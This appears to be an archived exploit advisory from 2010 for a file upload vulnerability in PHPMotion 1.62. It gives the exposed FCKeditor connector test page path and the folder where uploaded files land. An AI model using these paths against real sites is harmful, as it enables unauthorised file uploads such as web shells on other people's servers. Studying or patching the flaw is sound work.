id: 13299
date: 11/24/2010
title: PHPMotion FCKeditor File Upload Vulnerability
author: trycyber
cves: 

=============================================
PHPMotion FCKeditor File Upload Vulnerability
=============================================

Author      : trycyber (trycyber@magelangcyber.com)
Homepage    : http://indonesiancoder.com,magelangcyber.web.id
Vendor      : http://www.phpmotion.com/
Dork        : CIHUY ;p
Version         : 1.62
Tested on   : Win Xp sp2   
Date        : November 23, 2010
-----------------------------------------------------------------------
 
I.  POC & Exploit
-----------------------------------------------------------------------
Default     :   http://127.0.0.1/
 
 
exploit     :   http://127.0.0.1/phpmotion/fckeditor/editor/filemanager/connectors/test.html
             
 
results in  :   http://127.0.0.1/userfiles/name of file  



#  0day.today [2023-03-25]  #